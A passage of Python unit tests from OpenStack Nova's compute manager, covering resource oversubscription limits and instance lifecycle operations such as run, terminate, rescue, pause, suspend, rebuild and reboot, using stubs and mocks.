self.compute.run_instance(self.context, instance=instance,
filter_properties=filter_properties)
        self.assertEqual(3072, self.rt.compute_node['memory_mb_used'])
        self.assertEqual(768, self.rt.compute_node['local_gb_used'])
params = {"memory_mb": 8192, "root_gb": 8192, "ephemeral_gb": 8192}
instance = self._create_fake_instance(params)
self.assertRaises(exception.ComputeResourcesUnavailable,
self.compute.run_instance, self.context, instance=instance,
filter_properties=filter_properties)
def test_create_multiple_instance_with_neutron_port(self):
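        # Requesting multiple instances with a specific neutron port is
        # not allowed.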
instance_type = flavors.get_default_flavor()
def fake_is_neutron():
return True
self.stubs.Set(utils, 'is_neutron', fake_is_neutron)
self.assertRaises(exception.MultiplePortsNotApplicable,
self.compute_api.create,
self.context,
instance_type=instance_type,
image_href=None,
max_count=2,
requested_networks=[(None, None, 'adadds')])
def test_create_instance_with_oversubscribed_ram(self):
# Test passing of oversubscribed ram policy from the scheduler.
self.flags(reserved_host_disk_mb=0, reserved_host_memory_mb=0)
self.rt.update_available_resource(self.context.elevated())
# get total memory as reported by virt driver:
resources = self.compute.driver.get_available_resource(NODENAME)
total_mem_mb = resources['memory_mb']
oversub_limit_mb = total_mem_mb * 1.5
instance_mb = int(total_mem_mb * 1.45)
# build an instance, specifying an amount of memory that exceeds
# total_mem_mb, but is less than the oversubscribed limit:
params = {"memory_mb": instance_mb, "root_gb": 128,
"ephemeral_gb": 128}
instance = self._create_fake_instance(params)
limits = {'memory_mb': oversub_limit_mb}
filter_properties = {'limits': limits}
self.compute.run_instance(self.context, instance=instance,
filter_properties=filter_properties)
self.assertEqual(instance_mb, self.rt.compute_node['memory_mb_used'])
def test_create_instance_with_oversubscribed_ram_fail(self):
"""Test passing of oversubscribed ram policy from the scheduler, but
with insufficient memory.
"""
self.flags(reserved_host_disk_mb=0, reserved_host_memory_mb=0)
self.rt.update_available_resource(self.context.elevated())
# get total memory as reported by virt driver:
resources = self.compute.driver.get_available_resource(NODENAME)
total_mem_mb = resources['memory_mb']
oversub_limit_mb = total_mem_mb * 1.5
instance_mb = int(total_mem_mb * 1.55)
# build an instance, specifying an amount of memory that exceeds
# total_mem_mb, but is less than the oversubscribed limit:
params = {"memory_mb": instance_mb, "root_gb": 128,
"ephemeral_gb": 128}
instance = self._create_fake_instance(params)
filter_properties = {'limits': {'memory_mb': oversub_limit_mb}}
self.assertRaises(exception.ComputeResourcesUnavailable,
self.compute.run_instance, self.context, instance=instance,
filter_properties=filter_properties)
def test_create_instance_with_oversubscribed_cpu(self):
# Test passing of oversubscribed cpu policy from the scheduler.
self.flags(reserved_host_disk_mb=0, reserved_host_memory_mb=0)
self.rt.update_available_resource(self.context.elevated())
limits = {'vcpu': 3}
filter_properties = {'limits': limits}
# get total memory as reported by virt driver:
resources = self.compute.driver.get_available_resource(NODENAME)
self.assertEqual(1, resources['vcpus'])
# build an instance, specifying an amount of memory that exceeds
# total_mem_mb, but is less than the oversubscribed limit:
params = {"memory_mb": 10, "root_gb": 1,
"ephemeral_gb": 1, "vcpus": 2}
instance = self._create_fake_instance(params)
self.compute.run_instance(self.context, instance=instance,
filter_properties=filter_properties)
self.assertEqual(2, self.rt.compute_node['vcpus_used'])
# create one more instance:
params = {"memory_mb": 10, "root_gb": 1,
"ephemeral_gb": 1, "vcpus": 1}
instance = self._create_fake_instance(params)
self.compute.run_instance(self.context, instance=instance,
filter_properties=filter_properties)
self.assertEqual(3, self.rt.compute_node['vcpus_used'])
# delete the instance:
instance['vm_state'] = vm_states.DELETED
self.rt.update_usage(self.context,
instance=instance)
self.assertEqual(2, self.rt.compute_node['vcpus_used'])
# now oversubscribe vcpus and fail:
params = {"memory_mb": 10, "root_gb": 1,
"ephemeral_gb": 1, "vcpus": 2}
instance = self._create_fake_instance(params)
limits = {'vcpu': 3}
filter_properties = {'limits': limits}
self.assertRaises(exception.ComputeResourcesUnavailable,
self.compute.run_instance, self.context, instance=instance,
filter_properties=filter_properties)
def test_create_instance_with_oversubscribed_disk(self):
# Test passing of oversubscribed disk policy from the scheduler.
self.flags(reserved_host_disk_mb=0, reserved_host_memory_mb=0)
self.rt.update_available_resource(self.context.elevated())
# get total memory as reported by virt driver:
resources = self.compute.driver.get_available_resource(NODENAME)
total_disk_gb = resources['local_gb']
oversub_limit_gb = total_disk_gb * 1.5
instance_gb = int(total_disk_gb * 1.45)
# build an instance, specifying an amount of disk that exceeds
# total_disk_gb, but is less than the oversubscribed limit:
params = {"root_gb": instance_gb, "memory_mb": 10}
instance = self._create_fake_instance(params)
limits = {'disk_gb': oversub_limit_gb}
filter_properties = {'limits': limits}
self.compute.run_instance(self.context, instance=instance,
filter_properties=filter_properties)
self.assertEqual(instance_gb, self.rt.compute_node['local_gb_used'])
def test_create_instance_with_oversubscribed_disk_fail(self):
"""Test passing of oversubscribed disk policy from the scheduler, but
with insufficient disk.
"""
self.flags(reserved_host_disk_mb=0, reserved_host_memory_mb=0)
self.rt.update_available_resource(self.context.elevated())
# get total memory as reported by virt driver:
resources = self.compute.driver.get_available_resource(NODENAME)
total_disk_gb = resources['local_gb']
oversub_limit_gb = total_disk_gb * 1.5
instance_gb = int(total_disk_gb * 1.55)
# build an instance, specifying an amount of disk that exceeds
# total_disk_gb, but is less than the oversubscribed limit:
params = {"root_gb": instance_gb, "memory_mb": 10}
instance = self._create_fake_instance(params)
limits = {'disk_gb': oversub_limit_gb}
filter_properties = {'limits': limits}
self.assertRaises(exception.ComputeResourcesUnavailable,
self.compute.run_instance, self.context, instance=instance,
filter_properties=filter_properties)
def test_create_instance_without_node_param(self):
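        # The compute manager should fill in its own node name when none
        # is supplied.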
instance = self._create_fake_instance({'node': None})
self.compute.run_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
instance = instances[0]
self.assertEqual(NODENAME, instance['node'])
def test_create_instance_no_image(self):
# Create instance with no image provided.
params = {'image_ref': ''}
instance = self._create_fake_instance(params)
self.compute.run_instance(self.context, instance=instance)
self._assert_state({'vm_state': vm_states.ACTIVE,
'task_state': None})
def test_default_access_ip(self):
self.flags(default_access_ip_network_name='test1')
fake_network.unset_stub_network_methods(self.stubs)
instance = jsonutils.to_primitive(self._create_fake_instance())
orig_update = self.compute._instance_update
# Make sure the access_ip_* updates happen in the same DB
# update as the set to ACTIVE.
def _instance_update(ctxt, instance_uuid, **kwargs):
if kwargs.get('vm_state', None) == vm_states.ACTIVE:
self.assertEqual(kwargs['access_ip_v4'], '192.168.1.100')
self.assertEqual(kwargs['access_ip_v6'], '2001:db8:0:1::1')
return orig_update(ctxt, instance_uuid, **kwargs)
self.stubs.Set(self.compute, '_instance_update', _instance_update)
try:
self.compute.run_instance(self.context, instance=instance,
is_first_time=True)
instances = db.instance_get_all(self.context)
instance = instances[0]
self.assertEqual(instance['access_ip_v4'], '192.168.1.100')
self.assertEqual(instance['access_ip_v6'], '2001:db8:0:1::1')
finally:
db.instance_destroy(self.context, instance['uuid'])
def test_no_default_access_ip(self):
instance = jsonutils.to_primitive(self._create_fake_instance())
try:
self.compute.run_instance(self.context, instance=instance,
is_first_time=True)
instances = db.instance_get_all(self.context)
instance = instances[0]
self.assertFalse(instance['access_ip_v4'])
self.assertFalse(instance['access_ip_v6'])
finally:
db.instance_destroy(self.context, instance['uuid'])
def test_fail_to_schedule_persists(self):
# check the persistence of the ERROR(scheduling) state.
params = {'vm_state': vm_states.ERROR,
'task_state': task_states.SCHEDULING}
self._create_fake_instance(params=params)
        # Check state is failed even after the periodic poll
self.compute.periodic_tasks(context.get_admin_context())
self._assert_state({'vm_state': vm_states.ERROR,
'task_state': task_states.SCHEDULING})
def test_run_instance_setup_block_device_mapping_fail(self):
"""block device mapping failure test.
Make sure that when there is a block device mapping problem,
the instance goes to ERROR state, keeping the task state
"""
def fake(*args, **kwargs):
raise test.TestingException()
self.stubs.Set(nova.compute.manager.ComputeManager,
'_prep_block_device', fake)
instance = self._create_fake_instance()
self.assertRaises(test.TestingException, self.compute.run_instance,
self.context, instance=instance)
        # Check state is failed even after the periodic poll
self._assert_state({'vm_state': vm_states.ERROR,
'task_state': None})
self.compute.periodic_tasks(context.get_admin_context())
self._assert_state({'vm_state': vm_states.ERROR,
'task_state': None})
def test_run_instance_spawn_fail(self):
"""spawn failure test.
Make sure that when there is a spawning problem,
the instance goes to ERROR state, keeping the task state.
"""
def fake(*args, **kwargs):
raise test.TestingException()
self.stubs.Set(self.compute.driver, 'spawn', fake)
instance = self._create_fake_instance()
self.assertRaises(test.TestingException, self.compute.run_instance,
self.context, instance=instance)
        # Check state is failed even after the periodic poll
self._assert_state({'vm_state': vm_states.ERROR,
'task_state': None})
self.compute.periodic_tasks(context.get_admin_context())
self._assert_state({'vm_state': vm_states.ERROR,
'task_state': None})
def test_run_instance_dealloc_network_instance_not_found(self):
"""spawn network deallocate test.
Make sure that when an instance is not found during spawn
that the network is deallocated
"""
instance = self._create_fake_instance()
def fake(*args, **kwargs):
raise exception.InstanceNotFound(instance_id="fake")
self.stubs.Set(self.compute.driver, 'spawn', fake)
self.mox.StubOutWithMock(self.compute, '_deallocate_network')
self.compute._deallocate_network(mox.IgnoreArg(), mox.IgnoreArg())
self.mox.ReplayAll()
self.compute.run_instance(self.context, instance=instance)
def test_run_instance_bails_on_missing_instance(self):
# Make sure that run_instance() will quickly ignore a deleted instance
called = {}
instance = self._create_fake_instance()
def fake_instance_update(self, *a, **args):
called['instance_update'] = True
raise exception.InstanceNotFound(instance_id='foo')
self.stubs.Set(self.compute, '_instance_update', fake_instance_update)
self.compute.run_instance(self.context, instance)
self.assertIn('instance_update', called)
def test_run_instance_bails_on_missing_instance_2(self):
# Make sure that run_instance() will quickly ignore a deleted instance
called = {}
instance = self._create_fake_instance()
def fake_default_block_device_names(self, *a, **args):
called['default_block_device_names'] = True
raise exception.InstanceNotFound(instance_id='foo')
self.stubs.Set(self.compute, '_default_block_device_names',
fake_default_block_device_names)
self.compute.run_instance(self.context, instance)
self.assertIn('default_block_device_names', called)
def test_can_terminate_on_error_state(self):
# Make sure that the instance can be terminated in ERROR state.
        # Check failed to schedule --> terminate
params = {'vm_state': vm_states.ERROR}
instance = self._create_fake_instance(params=params)
self.compute.terminate_instance(self.context, instance=instance)
self.assertRaises(exception.InstanceNotFound, db.instance_get_by_uuid,
self.context, instance['uuid'])
# Double check it's not there for admins, either.
self.assertRaises(exception.InstanceNotFound, db.instance_get_by_uuid,
self.context.elevated(), instance['uuid'])
def test_run_terminate(self):
# Make sure it is possible to run and terminate instance.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
LOG.info(_("Running instances: %s"), instances)
self.assertEqual(len(instances), 1)
self.compute.terminate_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
LOG.info(_("After terminating instances: %s"), instances)
self.assertEqual(len(instances), 0)
admin_deleted_context = context.get_admin_context(
read_deleted="only")
instance = db.instance_get_by_uuid(admin_deleted_context,
instance['uuid'])
self.assertEqual(instance['vm_state'], vm_states.DELETED)
self.assertEqual(instance['task_state'], None)
def test_run_terminate_with_vol_attached(self):
"""Make sure it is possible to run and terminate instance with volume
attached
"""
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
LOG.info(_("Running instances: %s"), instances)
self.assertEqual(len(instances), 1)
def fake_check_attach(*args, **kwargs):
pass
def fake_reserve_volume(*args, **kwargs):
pass
def fake_volume_get(self, context, volume_id):
return {'id': volume_id}
def fake_rpc_reserve_block_device_name(self, context, **kwargs):
pass
self.stubs.Set(cinder.API, 'get', fake_volume_get)
self.stubs.Set(cinder.API, 'check_attach', fake_check_attach)
self.stubs.Set(cinder.API, 'reserve_volume',
fake_reserve_volume)
self.stubs.Set(compute_rpcapi.ComputeAPI,
'reserve_block_device_name',
fake_rpc_reserve_block_device_name)
self.compute_api.attach_volume(self.context, instance, 1,
'/dev/vdc')
self.compute.terminate_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
LOG.info(_("After terminating instances: %s"), instances)
self.assertEqual(len(instances), 0)
bdms = db.block_device_mapping_get_all_by_instance(self.context,
instance['uuid'])
self.assertEqual(len(bdms), 0)
def test_run_terminate_no_image(self):
"""
Make sure instance started without image (from volume)
        can be terminated without issues
"""
params = {'image_ref': ''}
instance = self._create_fake_instance(params)
self.compute.run_instance(self.context, instance=instance)
self._assert_state({'vm_state': vm_states.ACTIVE,
'task_state': None})
self.compute.terminate_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
self.assertEqual(len(instances), 0)
def test_terminate_no_network(self):
# This is as reported in LP bug 1008875
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
LOG.info(_("Running instances: %s"), instances)
self.assertEqual(len(instances), 1)
        # Make it look like the instance's network cannot be found
self.mox.StubOutWithMock(self.compute, '_get_instance_nw_info')
self.compute._get_instance_nw_info(
mox.IgnoreArg(),
mox.IgnoreArg()).AndRaise(
exception.NetworkNotFound(network_id='fake')
)
self.mox.ReplayAll()
self.compute.terminate_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
LOG.info(_("After terminating instances: %s"), instances)
self.assertEqual(len(instances), 0)
def test_terminate_no_fixed_ips(self):
# This is as reported in LP bug 1192893
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
LOG.info(_("Running instances: %s"), instances)
self.assertEqual(len(instances), 1)
self.mox.StubOutWithMock(self.compute, '_get_instance_nw_info')
self.compute._get_instance_nw_info(
mox.IgnoreArg(),
mox.IgnoreArg()).AndRaise(
exception.NoMoreFixedIps()
)
self.mox.ReplayAll()
self.compute.terminate_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
LOG.info(_("After terminating instances: %s"), instances)
self.assertEqual(len(instances), 0)
def test_run_terminate_timestamps(self):
# Make sure timestamps are set for launched and destroyed.
instance = jsonutils.to_primitive(self._create_fake_instance())
instance['launched_at'] = None
self.assertEqual(instance['launched_at'], None)
self.assertEqual(instance['deleted_at'], None)
launch = timeutils.utcnow()
self.compute.run_instance(self.context, instance=instance)
instance = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertTrue(instance['launched_at'] > launch)
self.assertEqual(instance['deleted_at'], None)
terminate = timeutils.utcnow()
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(instance))
with utils.temporary_mutation(self.context, read_deleted='only'):
instance = db.instance_get_by_uuid(self.context,
instance['uuid'])
self.assertTrue(instance['launched_at'] < terminate)
self.assertTrue(instance['deleted_at'] > terminate)
def test_run_terminate_deallocate_net_failure_sets_error_state(self):
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
LOG.info(_("Running instances: %s"), instances)
self.assertEqual(len(instances), 1)
def _fake_deallocate_network(*args, **kwargs):
raise test.TestingException()
self.stubs.Set(self.compute, '_deallocate_network',
_fake_deallocate_network)
try:
self.compute.terminate_instance(self.context, instance=instance)
except test.TestingException:
pass
instance = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertEqual(instance['vm_state'], vm_states.ERROR)
def test_stop(self):
# Ensure instance can be stopped.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.POWERING_OFF})
inst_uuid = instance['uuid']
extra = ['system_metadata', 'metadata']
inst_obj = instance_obj.Instance.get_by_uuid(self.context,
inst_uuid,
expected_attrs=extra)
self.compute.stop_instance(self.context, instance=inst_obj)
self.compute.terminate_instance(self.context, instance=instance)
def test_start(self):
# Ensure instance can be started.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.POWERING_OFF})
extra = ['system_metadata', 'metadata']
inst_uuid = instance['uuid']
inst_obj = instance_obj.Instance.get_by_uuid(self.context,
inst_uuid,
expected_attrs=extra)
self.compute.stop_instance(self.context, instance=inst_obj)
inst_obj.task_state = task_states.POWERING_ON
inst_obj.save(self.context)
self.compute.start_instance(self.context, instance=inst_obj)
self.compute.terminate_instance(self.context, instance=instance)
def test_stop_start_no_image(self):
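        # Ensure an instance started without an image (from volume) can
        # be stopped and started.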
params = {'image_ref': ''}
instance = self._create_fake_instance(params)
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.POWERING_OFF})
extra = ['system_metadata', 'metadata']
inst_uuid = instance['uuid']
inst_obj = instance_obj.Instance.get_by_uuid(self.context,
inst_uuid,
expected_attrs=extra)
self.compute.stop_instance(self.context, instance=inst_obj)
inst_obj.task_state = task_states.POWERING_ON
inst_obj.save(self.context)
self.compute.start_instance(self.context, instance=inst_obj)
self.compute.terminate_instance(self.context, instance=instance)
def test_rescue(self):
# Ensure instance can be rescued and unrescued.
called = {'rescued': False,
'unrescued': False}
def fake_rescue(self, context, instance_ref, network_info, image_meta,
rescue_password):
called['rescued'] = True
self.stubs.Set(nova.virt.fake.FakeDriver, 'rescue', fake_rescue)
def fake_unrescue(self, instance_ref, network_info):
called['unrescued'] = True
self.stubs.Set(nova.virt.fake.FakeDriver, 'unrescue',
fake_unrescue)
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance_uuid,
{"task_state": task_states.RESCUING})
self.compute.rescue_instance(self.context, instance=instance)
self.assertTrue(called['rescued'])
db.instance_update(self.context, instance_uuid,
{"task_state": task_states.UNRESCUING})
self.compute.unrescue_instance(self.context, instance=instance)
self.assertTrue(called['unrescued'])
self.compute.terminate_instance(self.context, instance=instance)
def test_rescue_notifications(self):
# Ensure notifications on instance rescue.
def fake_rescue(self, context, instance_ref, network_info, image_meta,
rescue_password):
pass
self.stubs.Set(nova.virt.fake.FakeDriver, 'rescue', fake_rescue)
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
self.compute.run_instance(self.context, instance=instance)
fake_notifier.NOTIFICATIONS = []
db.instance_update(self.context, instance_uuid,
{"task_state": task_states.RESCUING})
self.compute.rescue_instance(self.context, instance=instance)
expected_notifications = ['compute.instance.exists',
'compute.instance.rescue.start',
'compute.instance.rescue.end']
        self.assertEqual([m.event_type for m in fake_notifier.NOTIFICATIONS],
                         expected_notifications)
        for n, msg in enumerate(fake_notifier.NOTIFICATIONS):
            self.assertEqual(msg.event_type, expected_notifications[n])
            self.assertEqual(msg.priority, 'INFO')
            payload = msg.payload
            self.assertEqual(payload['tenant_id'], self.project_id)
            self.assertEqual(payload['user_id'], self.user_id)
            self.assertEqual(payload['instance_id'], instance_uuid)
            self.assertEqual(payload['instance_type'], 'm1.tiny')
            type_id = flavors.get_flavor_by_name('m1.tiny')['id']
            self.assertEqual(str(payload['instance_type_id']), str(type_id))
            self.assertIn('display_name', payload)
            self.assertIn('created_at', payload)
            self.assertIn('launched_at', payload)
            image_ref_url = glance.generate_image_url(FAKE_IMAGE_REF)
            self.assertEqual(payload['image_ref_url'], image_ref_url)
        msg = fake_notifier.NOTIFICATIONS[1]
        self.assertIn('rescue_image_name', msg.payload)
self.compute.terminate_instance(self.context, instance=instance)
def test_unrescue_notifications(self):
        # Ensure notifications on instance unrescue.
def fake_unrescue(self, instance_ref, network_info):
pass
self.stubs.Set(nova.virt.fake.FakeDriver, 'unrescue',
fake_unrescue)
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
self.compute.run_instance(self.context, instance=instance)
fake_notifier.NOTIFICATIONS = []
db.instance_update(self.context, instance_uuid,
{"task_state": task_states.UNRESCUING})
self.compute.unrescue_instance(self.context, instance=instance)
expected_notifications = ['compute.instance.unrescue.start',
'compute.instance.unrescue.end']
        self.assertEqual([m.event_type for m in fake_notifier.NOTIFICATIONS],
                         expected_notifications)
        for n, msg in enumerate(fake_notifier.NOTIFICATIONS):
            self.assertEqual(msg.event_type, expected_notifications[n])
            self.assertEqual(msg.priority, 'INFO')
            payload = msg.payload
            self.assertEqual(payload['tenant_id'], self.project_id)
            self.assertEqual(payload['user_id'], self.user_id)
            self.assertEqual(payload['instance_id'], instance_uuid)
            self.assertEqual(payload['instance_type'], 'm1.tiny')
            type_id = flavors.get_flavor_by_name('m1.tiny')['id']
            self.assertEqual(str(payload['instance_type_id']), str(type_id))
            self.assertIn('display_name', payload)
            self.assertIn('created_at', payload)
            self.assertIn('launched_at', payload)
            image_ref_url = glance.generate_image_url(FAKE_IMAGE_REF)
            self.assertEqual(payload['image_ref_url'], image_ref_url)
self.compute.terminate_instance(self.context, instance=instance)
def test_rescue_handle_err(self):
# If the driver fails to rescue, instance state should remain the same
# and the exception should be converted to InstanceNotRescuable
instance = jsonutils.to_primitive(self._create_fake_instance())
self.mox.StubOutWithMock(self.compute, '_get_rescue_image')
self.mox.StubOutWithMock(nova.virt.fake.FakeDriver, 'rescue')
self.compute._get_rescue_image(
mox.IgnoreArg(), instance).AndReturn({})
nova.virt.fake.FakeDriver.rescue(
mox.IgnoreArg(), instance, [], mox.IgnoreArg(), 'password'
).AndRaise(RuntimeError("Try again later"))
self.mox.ReplayAll()
expected_message = ('Instance %s cannot be rescued: '
'Driver Error: Try again later' % instance['uuid'])
instance['vm_state'] = 'some_random_state'
with testtools.ExpectedException(
exception.InstanceNotRescuable, expected_message):
self.compute.rescue_instance(
self.context, instance=instance,
rescue_password='password')
self.assertEqual('some_random_state', instance['vm_state'])
def test_power_on(self):
# Ensure instance can be powered on.
called = {'power_on': False}
def fake_driver_power_on(self, context, instance, network_info,
block_device_info):
called['power_on'] = True
self.stubs.Set(nova.virt.fake.FakeDriver, 'power_on',
fake_driver_power_on)
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
extra = ['system_metadata', 'metadata']
inst_obj = instance_obj.Instance.get_by_uuid(self.context,
instance['uuid'],
expected_attrs=extra)
inst_obj.task_state = task_states.POWERING_ON
inst_obj.save(self.context)
self.compute.start_instance(self.context, instance=inst_obj)
self.assertTrue(called['power_on'])
self.compute.terminate_instance(self.context, instance=inst_obj)
def test_power_off(self):
# Ensure instance can be powered off.
called = {'power_off': False}
def fake_driver_power_off(self, instance):
called['power_off'] = True
self.stubs.Set(nova.virt.fake.FakeDriver, 'power_off',
fake_driver_power_off)
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
extra = ['system_metadata', 'metadata']
inst_obj = instance_obj.Instance.get_by_uuid(self.context,
instance['uuid'],
expected_attrs=extra)
inst_obj.task_state = task_states.POWERING_OFF
inst_obj.save(self.context)
self.compute.stop_instance(self.context, instance=inst_obj)
self.assertTrue(called['power_off'])
self.compute.terminate_instance(self.context, instance=inst_obj)
def test_pause(self):
# Ensure instance can be paused and unpaused.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.PAUSING})
fake_notifier.NOTIFICATIONS = []
self.compute.pause_instance(self.context, instance=instance)
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual(msg.event_type,
'compute.instance.pause.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEqual(msg.event_type,
'compute.instance.pause.end')
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.UNPAUSING})
fake_notifier.NOTIFICATIONS = []
self.compute.unpause_instance(self.context, instance=instance)
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual(msg.event_type,
'compute.instance.unpause.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEqual(msg.event_type,
'compute.instance.unpause.end')
self.compute.terminate_instance(self.context, instance=instance)
def test_suspend(self):
        # Ensure instance can be suspended and resumed.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.SUSPENDING})
self.compute.suspend_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.RESUMING})
self.compute.resume_instance(self.context, instance=instance)
self.compute.terminate_instance(self.context, instance=instance)
def test_suspend_error(self):
# Ensure vm_state is ERROR when suspend error occurs.
def fake(*args, **kwargs):
raise test.TestingException()
self.stubs.Set(self.compute.driver, 'suspend', fake)
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
self.compute.run_instance(self.context, instance=instance)
self.assertRaises(test.TestingException,
self.compute.suspend_instance,
self.context,
instance=instance)
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['vm_state'], vm_states.ERROR)
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(instance))
def test_suspend_not_implemented(self):
# Ensure expected exception is raised and the vm_state of instance
# restore to original value if suspend is not implemented by driver
def fake(*args, **kwargs):
raise NotImplementedError('suspend test')
self.stubs.Set(self.compute.driver, 'suspend', fake)
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_state = instance['vm_state']
self.compute.run_instance(self.context, instance=instance)
self.assertRaises(NotImplementedError,
self.compute.suspend_instance,
self.context,
instance=instance)
instance = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertEqual(instance_state, instance['vm_state'])
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(instance))
def test_rebuild(self):
# Ensure instance can be rebuilt.
instance = jsonutils.to_primitive(self._create_fake_instance())
image_ref = instance['image_ref']
sys_metadata = db.instance_system_metadata_get(self.context,
instance['uuid'])
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.REBUILDING})
self.compute.rebuild_instance(self.context, instance,
image_ref, image_ref,
injected_files=[],
new_pass="new_password",
orig_sys_metadata=sys_metadata,
bdms=[])
self.compute.terminate_instance(self.context, instance=instance)
def test_rebuild_no_image(self):
# Ensure instance can be rebuilt when started with no image.
params = {'image_ref': ''}
instance = self._create_fake_instance(params)
sys_metadata = db.instance_system_metadata_get(self.context,
instance['uuid'])
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.REBUILDING})
self.compute.rebuild_instance(self.context, instance,
'', '', injected_files=[],
new_pass="new_password",
orig_sys_metadata=sys_metadata)
self.compute.terminate_instance(self.context, instance=instance)
def test_rebuild_launched_at_time(self):
# Ensure instance can be rebuilt.
old_time = datetime.datetime(2012, 4, 1)
cur_time = datetime.datetime(2012, 12, 21, 12, 21)
timeutils.set_time_override(old_time)
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
image_ref = instance['image_ref']
self.compute.run_instance(self.context, instance=instance)
timeutils.set_time_override(cur_time)
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.REBUILDING})
self.compute.rebuild_instance(self.context, instance,
image_ref, image_ref,
injected_files=[],
new_pass="new_password",
bdms=[])
        instance = db.instance_get_by_uuid(self.context, instance_uuid)
        self.assertEqual(cur_time, instance['launched_at'])
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(instance))
def test_rebuild_with_injected_files(self):
# Ensure instance can be rebuilt with injected files.
injected_files = [
('/a/b/c', base64.b64encode('foobarbaz')),
]
self.decoded_files = [
('/a/b/c', 'foobarbaz'),
]
def _spawn(context, instance, image_meta, injected_files,
admin_password, network_info, block_device_info):
self.assertEqual(self.decoded_files, injected_files)
self.stubs.Set(self.compute.driver, 'spawn', _spawn)
instance = jsonutils.to_primitive(self._create_fake_instance())
image_ref = instance['image_ref']
sys_metadata = db.instance_system_metadata_get(self.context,
instance['uuid'])
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.REBUILDING})
self.compute.rebuild_instance(self.context, instance,
image_ref, image_ref,
injected_files=injected_files,
new_pass="new_password",
orig_sys_metadata=sys_metadata,
bdms=[])
self.compute.terminate_instance(self.context, instance=instance)
def _test_reboot(self, soft,
test_delete=False, test_unrescue=False,
fail_reboot=False, fail_running=False):
# This is a true unit test, so we don't need the network stubs.
fake_network.unset_stub_network_methods(self.stubs)
self.mox.StubOutWithMock(self.compute,
'_get_instance_volume_block_device_info')
self.mox.StubOutWithMock(self.compute, '_get_instance_nw_info')
self.mox.StubOutWithMock(self.compute, '_notify_about_instance_usage')
self.mox.StubOutWithMock(self.compute, '_instance_update')
self.mox.StubOutWithMock(db, 'instance_update_and_get_original')
self.mox.StubOutWithMock(self.compute, '_get_power_state')
self.mox.StubOutWithMock(self.compute.driver, 'reboot')
# FIXME(comstud): I don't feel like the context needs to
# be elevated at all. Hopefully remove elevated from
# reboot_instance and remove the stub here in a future patch.
# econtext would just become self.context below then.
econtext = self.context.elevated()
db_instance = fake_instance.fake_db_instance(
**dict(uuid='fake-instance',
power_state=power_state.NOSTATE,
vm_state=vm_states.ACTIVE,
launched_at=timeutils.utcnow()))
instance = instance_obj.Instance._from_db_object(
econtext, instance_obj.Instance(), db_instance)
updated_dbinstance1 = fake_instance.fake_db_instance(
**dict(uuid='updated-instance1',
power_state=10003,
vm_state=vm_states.ACTIVE,
launched_at=timeutils.utcnow()))
updated_dbinstance2 = fake_instance.fake_db_instance(
**dict(uuid='updated-instance2',
power_state=10003,
vm_state=vm_states.ACTIVE,
launched_at=timeutils.utcnow()))
if test_unrescue:
instance['vm_state'] = vm_states.RESCUED
instance.obj_reset_changes()
fake_nw_model = network_model.NetworkInfo()
fake_block_dev_info = 'fake_block_dev_info'
fake_power_state1 = 10001
fake_power_state2 = power_state.RUNNING
